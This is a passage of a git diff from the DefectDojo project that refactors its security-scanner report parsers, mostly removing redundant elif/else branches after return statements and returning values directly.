+88,3 @@ def get_item(item_node, test): mitigated=None, impact="No impact provided", ) - - return finding diff --git a/dojo/tools/nuclei/parser.py b/dojo/tools/nuclei/parser.py index dc79eacaf65..4c843c6dca1 100644 --- a/dojo/tools/nuclei/parser.py +++ b/dojo/tools/nuclei/parser.py @@ -33,7 +33,7 @@ def get_findings(self, filename, test): data = [] if filecontent == "" or len(filecontent) == 0: return [] - elif filecontent[0] == "[": + if filecontent[0] == "[": content = json.loads(filecontent) for template in content: data.append(template) diff --git a/dojo/tools/openvas/csv_parser.py b/dojo/tools/openvas/csv_parser.py index 4d3011d82f9..c93a411bc92 100644 --- a/dojo/tools/openvas/csv_parser.py +++ b/dojo/tools/openvas/csv_parser.py @@ -21,10 +21,9 @@ def map_column_value(self, finding, column_value): def evaluate_bool_value(column_value): if column_value.lower() == "true": return True - elif column_value.lower() == "false": + if column_value.lower() == "false": return False - else: - return None + return None def process_column(self, column_name, column_value, finding): if ( diff --git a/dojo/tools/openvas/parser.py b/dojo/tools/openvas/parser.py index a103a4d8921..9f366c17694 100644 --- a/dojo/tools/openvas/parser.py +++ b/dojo/tools/openvas/parser.py @@ -15,5 +15,6 @@ def get_description_for_scan_types(self, scan_type): def get_findings(self, filename, test): if str(filename.name).endswith(".csv"): return OpenVASCSVParser().get_findings(filename, test) - elif str(filename.name).endswith(".xml"): + if str(filename.name).endswith(".xml"): return OpenVASXMLParser().get_findings(filename, test) + return None diff --git a/dojo/tools/openvas/xml_parser.py b/dojo/tools/openvas/xml_parser.py index bd9d365e0da..32b7d001ca9 100644 --- a/dojo/tools/openvas/xml_parser.py +++ b/dojo/tools/openvas/xml_parser.py @@ -50,11 +50,10 @@ def convert_cvss_score(self, raw_value): val = float(raw_value) if val == 0.0: return "Info" - elif val < 4.0: + if val < 4.0: return "Low" - elif val < 7.0: + if val < 7.0: return "Medium" - elif val < 9.0: + if val < 9.0: return "High" - else: - return "Critical" + return "Critical" diff --git a/dojo/tools/ort/parser.py b/dojo/tools/ort/parser.py index f314365ed88..9f0927bd1cf 100644 --- a/dojo/tools/ort/parser.py +++ b/dojo/tools/ort/parser.py @@ -24,8 +24,7 @@ def get_findings(self, json_output, test): evaluated_model = self.parse_json(json_output) if evaluated_model: return self.get_items(evaluated_model, test) - else: - return [] + return [] def parse_json(self, json_output): try: @@ -78,17 +77,14 @@ def is_rule_violation_unresolved(rule_violation): def find_in_dependency_tree(tree, package_id): if "pkg" in tree and tree["pkg"] == package_id: return True - else: - if "children" in tree: - found_in_child = False - for child in tree["children"]: - if found_in_child: - break - else: - found_in_child = find_in_dependency_tree(child, package_id) - return found_in_child - else: - return False + if "children" in tree: + found_in_child = False + for child in tree["children"]: + if found_in_child: + break + found_in_child = find_in_dependency_tree(child, package_id) + return found_in_child + return False def get_project_ids_for_package(dependency_trees, package_id): @@ -172,7 +168,7 @@ def get_item(model, test): severity = get_severity(model.rule_violation) - finding = Finding( + return Finding( title=model.rule_violation["rule"], test=test, references=model.rule_violation["message"], @@ -181,8 +177,6 @@ def get_item(model, test): static_finding=True, ) - return finding - # TODO: with python 3.7 # @dataclass @@ -200,9 +194,8 @@ def get_item(model, test): def get_severity(rule_violation): if rule_violation["severity"] == "ERROR": return "High" - elif rule_violation["severity"] == "WARNING": + if rule_violation["severity"] == "WARNING": return "Medium" - elif rule_violation["severity"] == "HINT": + if rule_violation["severity"] == "HINT": return "Info" - else: - return "Critical" + return "Critical" diff --git a/dojo/tools/ossindex_devaudit/parser.py b/dojo/tools/ossindex_devaudit/parser.py index ed89887e29c..95ddb102d26 100644 --- a/dojo/tools/ossindex_devaudit/parser.py +++ b/dojo/tools/ossindex_devaudit/parser.py @@ -24,8 +24,7 @@ def get_findings(self, json_file, test): if tree: return list(self.get_items(tree, test)) - else: - return [] + return [] def parse_json(self, json_file): if json_file is None: @@ -71,7 +70,7 @@ def get_item( msg = "Attempting to convert the CWE value to an integer failed" raise ValueError(msg) - finding = Finding( + return Finding( title=dependency_source + ":" + dependency_name @@ -97,8 +96,6 @@ def get_item( impact="No impact provided by scan", ) - return finding - def get_severity(cvss_score): result = "Info" diff --git a/dojo/tools/php_security_audit_v2/parser.py b/dojo/tools/php_security_audit_v2/parser.py index e677e252545..674f35f44c8 100644 --- a/dojo/tools/php_security_audit_v2/parser.py +++ b/dojo/tools/php_security_audit_v2/parser.py @@ -73,9 +73,8 @@ def get_severity_word(severity): if sev == 5: return "Critical" - elif sev == 4: + if sev == 4: return "High" - elif sev == 3: + if sev == 3: return "Medium" - else: - return "Low" + return "Low" diff --git a/dojo/tools/php_symfony_security_check/parser.py b/dojo/tools/php_symfony_security_check/parser.py index e3788759c7d..2fd2cace6ba 100644 --- a/dojo/tools/php_symfony_security_check/parser.py +++ b/dojo/tools/php_symfony_security_check/parser.py @@ -19,7 +19,7 @@ def get_findings(self, json_file, test): def parse_json(self, json_file): if json_file is None: - return + return None try: data = json_file.read() try: diff --git a/dojo/tools/popeye/parser.py b/dojo/tools/popeye/parser.py index e3806c6f8d7..78c516a1b44 100644 --- a/dojo/tools/popeye/parser.py +++ b/dojo/tools/popeye/parser.py @@ -78,15 +78,13 @@ def get_findings(self, file, test): def get_popeye_level_string(self, level): if level == 1: return "Info" - elif level == 2: + if level == 2: return "Warning" - else: - return "Error" + return "Error" def get_defect_dojo_severity(self, level): if level == 1: return "Info" - elif level == 2: + if level == 2: return "Low" - else: - return "High" + return "High" diff --git a/dojo/tools/pwn_sast/parser.py b/dojo/tools/pwn_sast/parser.py index d66afa35127..dac79b67d95 100644 --- a/dojo/tools/pwn_sast/parser.py +++ b/dojo/tools/pwn_sast/parser.py @@ -119,3 +119,4 @@ def get_findings(self, filename, test): findings[unique_finding_key] = finding return list(findings.values()) + return None diff --git a/dojo/tools/qualys/csv_parser.py b/dojo/tools/qualys/csv_parser.py index 16ad062fc69..2f88814b447 100644 --- a/dojo/tools/qualys/csv_parser.py +++ b/dojo/tools/qualys/csv_parser.py @@ -28,9 +28,7 @@ def parse_csv(csv_file) -> [Finding]: ) report_findings = get_report_findings(csv_reader) - dojo_findings = build_findings_from_dict(report_findings) - - return dojo_findings + return build_findings_from_dict(report_findings) def get_report_findings(csv_reader) -> [dict]: @@ -93,6 +91,7 @@ def _extract_cvss_vectors(cvss_base, cvss_temporal): ) return cvss_vector + return None def _clean_cve_data(cve_string: str) -> list: @@ -131,8 +130,7 @@ def get_severity(value: str) -> str: if settings.USE_QUALYS_LEGACY_SEVERITY_PARSING: return legacy_severity_lookup.get(value, "Info") - else: - return qualys_severity_lookup.get(value, "Info") + return qualys_severity_lookup.get(value, "Info") def build_findings_from_dict(report_findings: [dict]) -> [Finding]: diff --git a/dojo/tools/qualys/parser.py b/dojo/tools/qualys/parser.py index ade88d2d325..96f14a9441b 100644 --- a/dojo/tools/qualys/parser.py +++ b/dojo/tools/qualys/parser.py @@ -310,5 +310,4 @@ def get_description_for_scan_types(self, scan_type): def get_findings(self, file, test): if file.name.lower().endswith(".csv"): return csv_parser.parse_csv(file) - else: - return qualys_parser(file) + return qualys_parser(file) diff --git a/dojo/tools/qualys_infrascan_webgui/parser.py b/dojo/tools/qualys_infrascan_webgui/parser.py index f252e7d5414..2d26eeafc06 100644 --- a/dojo/tools/qualys_infrascan_webgui/parser.py +++ b/dojo/tools/qualys_infrascan_webgui/parser.py @@ -114,16 +114,15 @@ def qualys_convert_severity(raw_val): val = str(raw_val).strip() if "1" == val: return "Info" - elif "2" == val: + if "2" == val: return "Low" - elif "3" == val: + if "3" == val: return "Medium" - elif "4" == val: + if "4" == val: return "High" - elif "5" == val: + if "5" == val: return "Critical" - else: - return "Info" + return "Info" class QualysInfrascanWebguiParser: diff --git a/dojo/tools/qualys_webapp/parser.py b/dojo/tools/qualys_webapp/parser.py index 59c0d2b855c..9565f1dd1ee 100644 --- a/dojo/tools/qualys_webapp/parser.py +++ b/dojo/tools/qualys_webapp/parser.py @@ -37,8 +37,7 @@ def get_cwe(cwe): cweSearch = re.search("CWE-([0-9]*)", cwe, re.IGNORECASE) if cweSearch: return cweSearch.group(1) - else: - return 0 + return 0 def attach_unique_extras( @@ -171,8 +170,7 @@ def decode_tag(tag): if tag is not None: if tag.get("base64") == "true": return base64.b64decode(tag.text).decode("utf8", "replace") - else: - return tag.text + return tag.text return "" diff --git a/dojo/tools/retirejs/parser.py b/dojo/tools/retirejs/parser.py index 4cb162e8a42..edbda16a87f 100644 --- a/dojo/tools/retirejs/parser.py +++ b/dojo/tools/retirejs/parser.py @@ -62,7 +62,7 @@ def get_item(self, item_node, test, file): elif "osvdb" in item_node["identifiers"]: title = "".join(item_node["identifiers"]["osvdb"]) - finding = Finding( + return Finding( title=title, test=test, cwe=1035, # Vulnerable Third Party Component @@ -74,5 +74,3 @@ def get_item(self, item_node, test, file): duplicate=False, out_of_scope=False, ) - - return finding diff --git a/dojo/tools/risk_recon/parser.py b/dojo/tools/risk_recon/parser.py index 30c08e5161e..4ddcf64e16c 100644 --- a/dojo/tools/risk_recon/parser.py +++ b/dojo/tools/risk_recon/parser.py @@ -36,6 +36,7 @@ def get_findings(self, filename, test): findings = data.get("findings") return self._get_findings_internal(findings, test) + return None def _get_findings_internal(self, findings, test): dupes = {} diff --git a/dojo/tools/rusty_hog/parser.py b/dojo/tools/rusty_hog/parser.py index fa2a4f6ebc2..a4582106f0d 100644 --- a/dojo/tools/rusty_hog/parser.py +++ b/dojo/tools/rusty_hog/parser.py @@ -19,8 +19,7 @@ def get_findings(self, json_output, test): return self.get_items(tree, test) def parse_json(self, json_output): - tree = json.load(json_output) - return tree + return json.load(json_output) def get_items(self, json_output, scanner, test): items = {} @@ -79,7 +78,7 @@ def __getitem(self, vulnerabilities, scanner): for vulnerability in vulnerabilities: if scanner == "Rusty Hog": break - elif scanner == "Choctaw Hog": + if scanner == "Choctaw Hog": """Choctaw Hog""" found_secret_string = vulnerability.get("stringsFound") description = f"**This string was found:** {found_secret_string}" diff --git a/dojo/tools/sarif/parser.py b/dojo/tools/sarif/parser.py index b707205f9fe..eb83977f0c9 100644 --- a/dojo/tools/sarif/parser.py +++ b/dojo/tools/sarif/parser.py @@ -146,9 +146,9 @@ def get_message_from_multiformatMessageString(data, rule): text = text.replace(substitution_str, arguments[i]) else: return text - else: - # TODO: manage markdown - return data.get("text") + return None + # TODO: manage markdown + return data.get("text") def cve_try(val): @@ -156,8 +156,7 @@ def cve_try(val): cveSearch = re.search("(CVE-[0-9]+-[0-9]+)", val, re.IGNORECASE) if cveSearch: return cveSearch.group(1).upper() - else: - return None + return None def get_title(result, rule): @@ -327,14 +326,13 @@ def cvss_to_severity(cvss): if cvss >= 9: return severity_mapping.get(5) - elif cvss >= 7: + if cvss >= 7: return severity_mapping.get(4) - elif cvss >= 4: + if cvss >= 4: return severity_mapping.get(3) - elif cvss > 0: + if cvss > 0: return severity_mapping.get(2) - else: - return severity_mapping.get(1) + return severity_mapping.get(1) def get_severity(result, rule): @@ -346,12 +344,11 @@ def get_severity(result, rule): if "note" == severity: return "Info" - elif "warning" == severity: + if "warning" == severity: return "Medium" - elif "error" == severity: + if "error" == severity: return "High" - else: - return "Medium" + return "Medium" def get_item(result, rules, artifacts, run_date): diff --git a/dojo/tools/scout_suite/parser.py b/dojo/tools/scout_suite/parser.py index 45dd1dbdf0c..a95b91dcd02 100644 --- a/dojo/tools/scout_suite/parser.py +++ b/dojo/tools/scout_suite/parser.py @@ -150,8 +150,7 @@ def __get_items(self, data): def formatview(self, depth): if depth > 1: return "* " - else: - return "" + return "" def recursive_print(self, src, depth=0, key=""): def tabs(n): diff --git a/dojo/tools/semgrep/parser.py b/dojo/tools/semgrep/parser.py index aa4f7307503..a9afb107426 100644 --- a/dojo/tools/semgrep/parser.py +++ b/dojo/tools/semgrep/parser.py @@ -132,15 +132,14 @@ def get_findings(self, filename, test): def convert_severity(self, val): if "CRITICAL" == val.upper(): return "Critical" - elif "WARNING" == val.upper(): + if "WARNING" == val.upper(): return "Medium" - elif "ERROR" == val.upper() or "HIGH" == val.upper(): + if "ERROR" == val.upper() or "HIGH" == val.upper(): return "High" - elif "INFO" == val.upper(): + if "INFO" == val.upper(): return "Info" - else: - msg = f"Unknown value for severity: {val}" - raise ValueError(msg) + msg = f"Unknown value for severity: {val}" + raise ValueError(msg) def get_description(self, item): description = "" diff --git a/dojo/tools/snyk/parser.py b/dojo/tools/snyk/parser.py index 4d1a0e89437..634a16df73b 100644 --- a/dojo/tools/snyk/parser.py +++ b/dojo/tools/snyk/parser.py @@ -23,8 +23,7 @@ def get_findings(self, json_output, test): for moduleTree in reportTree: temp += self.process_tree(moduleTree, test) return temp - else: - return self.process_tree(reportTree, test) + return self.process_tree(reportTree, test) def process_tree(self, tree, test): return list(self.get_items(tree, test)) if tree else [] @@ -238,7 +237,7 @@ def get_code_item(self, vulnerability, test): else: severity = "Critical" # create the finding object - finding = Finding( + return Finding( title=ruleId + "_" + locations_uri, test=test, severity=severity, @@ -259,4 +258,3 @@ def get_code_item(self, vulnerability, test): static_finding=True, dynamic_finding=False, ) - return finding diff --git a/dojo/tools/snyk_code/parser.py b/dojo/tools/snyk_code/parser.py index a35b37251cf..875e49e006e 100644 --- a/dojo/tools/snyk_code/parser.py +++ b/dojo/tools/snyk_code/parser.py @@ -23,8 +23,7 @@ def get_findings(self, json_output, test): for moduleTree in reportTree: temp += self.process_tree(moduleTree, test) return temp - else: - return self.process_tree(reportTree, test) + return self.process_tree(reportTree, test) def process_tree(self, tree, test): return list(self.get_items(tree, test)) if tree else [] @@ -235,7 +234,7 @@ def get_code_item(self, vulnerability, test): else: severity = "Critical" # create the finding object - finding = Finding( + return Finding( vuln_id_from_tool=ruleId, file_path=locations_uri, title=ruleId + "_" + locations_uri, @@ -258,4 +257,3 @@ def get_code_item(self, vulnerability, test): static_finding=True, dynamic_finding=False, ) - return finding diff --git a/dojo/tools/sonarqube/parser.py b/dojo/tools/sonarqube/parser.py index b06a7e83fad..efba2488e9d 100644 --- a/dojo/tools/sonarqube/parser.py +++ b/dojo/tools/sonarqube/parser.py @@ -27,18 +27,16 @@ def get_label_for_scan_types(self, scan_type): def get_description_for_scan_types(self, scan_type): if scan_type == "SonarQube Scan": return "Aggregates findings per cwe, title, description, file_path. SonarQube output file can be imported in HTML format or JSON format. You can get the JSON output directly if you use the SonarQube API or generate with https://github.com/soprasteria/sonar-report version >= 1.1.0, recommend version >= 3.1.2" - else: - return "Import all findings from sonarqube html report or JSON format. SonarQube output file can be imported in HTML format or JSON format. Generate with https://github.com/soprasteria/sonar-report version >= 1.1.0, recommend version >= 3.1.2" + return "Import all findings from sonarqube html report or JSON format. SonarQube output file can be imported in HTML format or JSON format. Generate with https://github.com/soprasteria/sonar-report version >= 1.1.0, recommend version >= 3.1.2" def get_findings(self, file, test): if file.name.endswith(".json"): json_content = json.load(file) if json_content.get("date") and json_content.get("projectName") and json_content.get("hotspotKeys"): return SonarQubeSoprasteriaJSON().get_json_items(json_content, test, self.mode) - elif json_content.get("paging") and json_content.get("components"): + if json_content.get("paging") and json_content.get("components"): return SonarQubeRESTAPIJSON().get_json_items(json_content, test, self.mode) - else: - return [] + return [] if file.name.endswith(".zip"): if str(file.__class__) == "": input_zip = zipfile.ZipFile(file.name, "r") @@ -46,13 +44,12 @@ def get_findings(self, file, test): input_zip = zipfile.ZipFile(file, "r") zipdata = {name: input_zip.read(name) for name in input_zip.namelist()} return SonarQubeRESTAPIZIP().get_items(zipdata, test, self.mode) - else: - parser = etree.HTMLParser() - tree = etree.parse(file, parser) - if self.mode not in [None, "detailed"]: - raise ValueError( - "Internal error: Invalid mode " - + self.mode - + ". Expected: one of None, 'detailed'", - ) - return SonarQubeSoprasteriaHTML().get_items(tree, test, self.mode) + parser = etree.HTMLParser() + tree = etree.parse(file, parser) + if self.mode not in [None, "detailed"]: + raise ValueError( + "Internal error: Invalid mode " + + self.mode + + ". Expected: one of None, 'detailed'", + ) + return SonarQubeSoprasteriaHTML().get_items(tree, test, self.mode) diff --git a/dojo/tools/sonarqube/sonarqube_restapi_json.py b/dojo/tools/sonarqube/sonarqube_restapi_json.py index bb735f038c7..9a8e3bab226 100644 --- a/dojo/tools/sonarqube/sonarqube_restapi_json.py +++ b/dojo/tools/sonarqube/sonarqube_restapi_json.py @@ -233,12 +233,11 @@ def get_json_items(self, json_content, test, mode): def severitytranslator(self, severity): if severity == "BLOCKER": return "High" - elif severity == "MAJOR": + if severity == "MAJOR": return "Medium" - elif severity == "MINOR": + if severity == "MINOR": return "Low" - else: - return severity.lower().capitalize() + return severity.lower().capitalize() def returncomponent(self, json_content, key): components = json_content.get("components") diff --git a/dojo/tools/sonarqube/soprasteria_helper.py b/dojo/tools/sonarqube/soprasteria_helper.py index 47ddc3ddf79..2e7259e6376 100644 --- a/dojo/tools/sonarqube/soprasteria_helper.py +++ b/dojo/tools/sonarqube/soprasteria_helper.py @@ -14,16 +14,15 @@ def convert_sonar_severity(self, sonar_severity): sev = sonar_severity.lower() if sev == "blocker": return "Critical" - elif sev == "critical": + if sev == "critical": return "High" - elif sev == "major": + if sev == "major": return "Medium" - elif sev == "minor": + if sev == "minor": return "Low" - elif sev in ["high", "medium", "low"]: + if sev in ["high", "medium", "low"]: return sev.capitalize() - else: - return "Info" + return "Info" def get_description(self, vuln_details): rule_description = etree.tostring( @@ -32,8 +31,7 @@ def get_description(self, vuln_details): rule_description = rule_description.split("

    See", 1)[0] rule_description = (str(rule_description)).replace("

    ", "**") rule_description = (str(rule_description)).replace("

    ", "**") - rule_description = strip_tags(rule_description).strip() - return rule_description + return strip_tags(rule_description).strip() def get_references(self, rule_name, vuln_details): rule_references = rule_name @@ -46,8 +44,7 @@ def get_cwe(self, vuln_references): cweSearch = re.search("CWE-([0-9]*)", vuln_references, re.IGNORECASE) if cweSearch: return cweSearch.group(1) - else: - return 0 + return 0 # Process one vuln from the report for "SonarQube Scan" # Create the finding and add it into the dupes list diff --git a/dojo/tools/sonatype/parser.py b/dojo/tools/sonatype/parser.py index e1b7bac1675..b82f1937c77 100644 --- a/dojo/tools/sonatype/parser.py +++ b/dojo/tools/sonatype/parser.py @@ -78,9 +78,8 @@ def get_finding(security_issue, component, test): def get_severity(vulnerability): if vulnerability["severity"] <= 3.9: return "Low" - elif vulnerability["severity"] <= 6.9: + if vulnerability["severity"] <= 6.9: return "Medium" - elif vulnerability["severity"] <= 8.9: + if vulnerability["severity"] <= 8.9: return "High" - else: - return "Critical" + return "Critical" diff --git a/dojo/tools/ssh_audit/parser.py b/dojo/tools/ssh_audit/parser.py index 5245b791b5e..e1980a2e55b 100644 --- a/dojo/tools/ssh_audit/parser.py +++ b/dojo/tools/ssh_audit/parser.py @@ -23,14 +23,13 @@ def convert_cvss_score(self, raw_value): val = float(raw_value) if val == 0.0: return "Info" - elif val < 4.0: + if val < 4.0: return "Low" - elif val < 7.0: + if val < 7.0: return "Medium" - elif val < 9.0: + if val < 9.0: return "High" - else: - return "Critical" + return "Critical" def get_findings(self, filename, test): items = [] diff --git a/dojo/tools/sslyze/parser.py b/dojo/tools/sslyze/parser.py index a80965f294b..a90edaa5db3 100644 --- a/dojo/tools/sslyze/parser.py +++ b/dojo/tools/sslyze/parser.py @@ -22,8 +22,7 @@ def get_findings(self, filename, test): if filename.name.lower().endswith(".xml"): return SSLyzeXMLParser().get_findings(filename, test) - elif filename.name.lower().endswith(".json"): + if filename.name.lower().endswith(".json"): return SSLyzeJSONParser().get_findings(filename, test) - else: - msg = "Unknown File Format" - raise ValueError(msg) + msg = "Unknown File Format" + raise ValueError(msg) diff --git a/dojo/tools/sslyze/parser_json.py b/dojo/tools/sslyze/parser_json.py index 28ec63f9e4c..e8e03d1030b 100644 --- a/dojo/tools/sslyze/parser_json.py +++ b/dojo/tools/sslyze/parser_json.py @@ -71,12 +71,13 @@ class SSLyzeJSONParser: def get_findings(self, json_output, test): if json_output is None: - return + return None tree = self.parse_json(json_output) if tree: return self.get_items(tree, test) + return None def parse_json(self, json_output): try: @@ -403,7 +404,7 @@ def get_weak_protocol(cipher, text, node, test, endpoint): return get_finding( title, description, None, REFERENCES, test, endpoint, ) - elif "result" in weak_node: + if "result" in weak_node: weak_node_result = weak_node["result"] if ( "accepted_cipher_suites" in weak_node_result @@ -622,5 +623,4 @@ def get_endpoint(node): port = si_node["port"] if hostname is not None: return Endpoint(host=hostname, port=port) - else: - return None + return None diff --git a/dojo/tools/stackhawk/parser.py b/dojo/tools/stackhawk/parser.py index 99d708cdc80..20462d804de 100644 --- a/dojo/tools/stackhawk/parser.py +++ b/dojo/tools/stackhawk/parser.py @@ -33,9 +33,7 @@ def get_findings(self, json_output, test): completed_scan = self.__parse_json(json_output) metadata = StackHawkScanMetadata(completed_scan) - findings = self.__extract_findings(completed_scan, metadata, test) - - return findings + return self.__extract_findings(completed_scan, metadata, test) def __extract_findings( self, completed_scan, metadata: StackHawkScanMetadata, test, @@ -142,12 +140,11 @@ def __hyperlink(link: str) -> str: def __endpoint_status(status: str) -> str: if status == "NEW": return "** - New**" - elif status == "RISK_ACCEPTED": + if status == "RISK_ACCEPTED": return '** - Marked "Risk Accepted"**' - elif status == "FALSE_POSITIVE": + if status == "FALSE_POSITIVE": return '** - Marked "False Positive"**' - else: - return "" + return "" @staticmethod def __are_all_endpoints_in_status(paths, check_status: str) -> bool: diff --git a/dojo/tools/sysdig_reports/parser.py b/dojo/tools/sysdig_reports/parser.py index 2db34b4a526..f4241e3bdca 100644 --- a/dojo/tools/sysdig_reports/parser.py +++ b/dojo/tools/sysdig_reports/parser.py @@ -27,15 +27,14 @@ def get_findings(self, filename, test): if filename.name.lower().endswith(".csv"): arr_data = CSVParser().parse(filename=filename) return self.parse_csv(arr_data=arr_data, test=test) - elif filename.name.lower().endswith(".json"): + if filename.name.lower().endswith(".json"): scan_data = filename.read() try: data = json.loads(str(scan_data, "utf-8")) except Exception: data = json.loads(scan_data) return self.parse_json(data=data, test=test) - else: - return () + return () def parse_json(self, data, test): vulnerability = data.get("data", None) diff --git a/dojo/tools/tenable/csv_format.py b/dojo/tools/tenable/csv_format.py index 5949db58156..c1ea9fc2c8d 100644 --- a/dojo/tools/tenable/csv_format.py +++ b/dojo/tools/tenable/csv_format.py @@ -70,8 +70,7 @@ def detect_delimiter(self, content: str): first_line = content.split("\n")[0] if ";" in first_line: return ";" - else: - return "," # default to comma if no semicolon found + return "," # default to comma if no semicolon found def get_findings(self, filename: str, test: Test): # Read the CSV diff --git a/dojo/tools/tenable/parser.py b/dojo/tools/tenable/parser.py index 2c8e00c4687..e6809190a09 100644 --- a/dojo/tools/tenable/parser.py +++ b/dojo/tools/tenable/parser.py @@ -19,8 +19,7 @@ def get_findings(self, filename, test): ".xml", ) or filename.name.lower().endswith(".nessus"): return TenableXMLParser().get_findings(filename, test) - elif filename.name.lower().endswith(".csv"): + if filename.name.lower().endswith(".csv"): return TenableCSVParser().get_findings(filename, test) - else: - msg = "Filename extension not recognized. Use .xml, .nessus or .csv" - raise ValueError(msg) + msg = "Filename extension not recognized. Use .xml, .nessus or .csv" + raise ValueError(msg) diff --git a/dojo/tools/trivy/parser.py b/dojo/tools/trivy/parser.py index defc54a9229..1fde84a80f0 100644 --- a/dojo/tools/trivy/parser.py +++ b/dojo/tools/trivy/parser.py @@ -57,18 +57,16 @@ def get_description_for_scan_types(self, scan_type): def convert_cvss_score(self, raw_value): if raw_value is None: return "Info" - else: - val = float(raw_value) - if val == 0.0: - return "Info" - elif val < 4.0: - return "Low" - elif val < 7.0: - return "Medium" - elif val < 9.0: - return "High" - else: - return "Critical" + val = float(raw_value) + if val == 0.0: + return "Info" + if val < 4.0: + return "Low" + if val < 7.0: + return "Medium" + if val < 9.0: + return "High" + return "Critical" def get_findings(self, scan_file, test): scan_data = scan_file.read() @@ -82,71 +80,69 @@ def get_findings(self, scan_file, test): if data is None: return [] # Legacy format with results - elif isinstance(data, list): + if isinstance(data, list): return self.get_result_items(test, data) - else: - schema_version = data.get("SchemaVersion", None) - artifact_name = data.get("ArtifactName", "") - cluster_name = data.get("ClusterName") - if schema_version == 2: - results = data.get("Results", []) - return self.get_result_items(test, results, artifact_name=artifact_name) - elif cluster_name: - findings = [] - vulnerabilities = data.get("Vulnerabilities", []) - for service in vulnerabilities: - namespace = service.get("Namespace") - kind = service.get("Kind") - name = service.get("Name") - service_name = "" - if namespace: - service_name = f"{namespace} / " - if kind: - service_name += f"{kind} / " - if name: - service_name += f"{name} / " - if len(service_name) >= 3: - service_name = service_name[:-3] - findings += self.get_result_items( - test, service.get("Results", []), service_name, - ) - misconfigurations = data.get("Misconfigurations", []) - for service in misconfigurations: - namespace = service.get("Namespace") - kind = service.get("Kind") - name = service.get("Name") - service_name = "" - if namespace: - service_name = f"{namespace} / " - if kind: - service_name += f"{kind} / " - if name: - service_name += f"{name} / " - if len(service_name) >= 3: - service_name = service_name[:-3] - findings += self.get_result_items( - test, service.get("Results", []), service_name, - ) - resources = data.get("Resources", []) - for resource in resources: - namespace = resource.get("Namespace") - kind = resource.get("Kind") - name = resource.get("Name") - if namespace: - resource_name = f"{namespace} / " - if kind: - resource_name += f"{kind} / " - if name: - resource_name += f"{name} / " - if len(resource_name) >= 3: - resource_name = resource_name[:-3] - findings += self.get_result_items( - test, resource.get("Results", []), resource_name, - ) - return findings - else: - msg = "Schema of Trivy json report is not supported" - raise ValueError(msg) + schema_version = data.get("SchemaVersion", None) + artifact_name = data.get("ArtifactName", "") + cluster_name = data.get("ClusterName") + if schema_version == 2: + results = data.get("Results", []) + return self.get_result_items(test, results, artifact_name=artifact_name) + if cluster_name: + findings = [] + vulnerabilities = data.get("Vulnerabilities", []) + for service in vulnerabilities: + namespace = service.get("Namespace") + kind = service.get("Kind") + name = service.get("Name") + service_name = "" + if namespace: + service_name = f"{namespace} / " + if kind: + service_name += f"{kind} / " + if name: + service_name += f"{name} / " + if len(service_name) >= 3: + service_name = service_name[:-3] + findings += self.get_result_items( + test, service.get("Results", []), service_name, + ) + misconfigurations = data.get("Misconfigurations", []) + for service in misconfigurations: + namespace = service.get("Namespace") + kind = service.get("Kind") + name = service.get("Name") + service_name = "" + if namespace: + service_name = f"{namespace} / " + if kind: + service_name += f"{kind} / " + if name: + service_name += f"{name} / " + if len(service_name) >= 3: + service_name = service_name[:-3] + findings += self.get_result_items( + test, service.get("Results", []), service_name, + ) + resources = data.get("Resources", []) + for resource in resources: + namespace = resource.get("Namespace") + kind = resource.get("Kind") + name = resource.get("Name") + if namespace: + resource_name = f"{namespace} / " + if kind: + resource_name += f"{kind} / " + if name: + resource_name += f"{name} / " + if len(resource_name) >= 3: + resource_name = resource_name[:-3] + findings += self.get_result_items( + test, resource.get("Results", []), resource_name, + ) + return findings + msg = "Schema of Trivy json report is not supported" + raise ValueError(msg) def get_result_items(self, test, results, service_name=None, artifact_name=""): items = [] diff --git a/dojo/tools/trufflehog/parser.py b/dojo/tools/trufflehog/parser.py index 9dd8234d09a..c51f3f8163e 100644 --- a/dojo/tools/trufflehog/parser.py +++ b/dojo/tools/trufflehog/parser.py @@ -26,10 +26,9 @@ def get_findings(self, filename, test): if "SourceMetadata" in json_data: return self.get_findings_v3(dict_strs, test) - elif "path" in json_data: + if "path" in json_data: return self.get_findings_v2(dict_strs, test) - else: - return [] + return [] def get_findings_v2(self, data, test): dupes = {} @@ -210,6 +209,5 @@ def walk_dict(self, obj, tab_count=1): value, tab_count=(tab_count + 1), ) continue - else: - return_string += f"{tab_string}{key}: {value}\n" + return_string += f"{tab_string}{key}: {value}\n" return return_string diff --git a/dojo/tools/trustwave_fusion_api/parser.py b/dojo/tools/trustwave_fusion_api/parser.py index 53358b26880..8ee522acc35 100644 --- a/dojo/tools/trustwave_fusion_api/parser.py +++ b/dojo/tools/trustwave_fusion_api/parser.py @@ -49,12 +49,11 @@ def convert_severity(self, num_severity): """Convert severity value""" if num_severity >= -10: return "Low" - elif -11 >= num_severity > -26: + if -11 >= num_severity > -26: return "Medium" - elif num_severity <= -26: + if num_severity <= -26: return "High" - else: - return "Info" + return "Info" def get_item(vuln, test): diff --git a/dojo/tools/twistlock/parser.py b/dojo/tools/twistlock/parser.py index 53a7f21fd16..740d72f8e68 100644 --- a/dojo/tools/twistlock/parser.py +++ b/dojo/tools/twistlock/parser.py @@ -67,7 +67,7 @@ def parse_issue(self, row, test): def parse(self, filename, test): if filename is None: - return + return None content = filename.read() dupes = {} if isinstance(content, bytes): @@ -190,16 +190,15 @@ def get_item(vulnerability, test): def convert_severity(severity): if severity.lower() == "important": return "High" - elif severity.lower() == "moderate": + if severity.lower() == "moderate": return "Medium" - elif severity.lower() == "information": + if severity.lower() == "information": return "Info" - elif severity.lower() == "informational": + if severity.lower() == "informational": return "Info" - elif severity == "": + if severity == "": return "Info" - else: - return severity.title() + return severity.title() class TwistlockParser: @@ -218,8 +217,7 @@ def get_findings(self, filename, test): if filename.name.lower().endswith(".json"): return TwistlockJsonParser().parse(filename, test) - elif filename.name.lower().endswith(".csv"): + if filename.name.lower().endswith(".csv"): return TwistlockCSVParser().parse(filename, test) - else: - msg = "Unknown File Format" - raise ValueError(msg) + msg = "Unknown File Format" + raise ValueError(msg) diff --git a/dojo/tools/utils.py b/dojo/tools/utils.py index 1a4ab328d21..f18b1f4f16e 100644 --- a/dojo/tools/utils.py +++ b/dojo/tools/utils.py @@ -16,7 +16,7 @@ def get_npm_cwe(item_node): if cwe_node: if isinstance(cwe_node, list): return int(cwe_node[0][4:]) - elif cwe_node.startswith("CWE-"): + if cwe_node.startswith("CWE-"): cwe_string = cwe_node[4:] if cwe_string: return int(cwe_string) diff --git a/dojo/tools/vcg/parser.py b/dojo/tools/vcg/parser.py index 0d29448a2ce..7b35eb81ddb 100644 --- 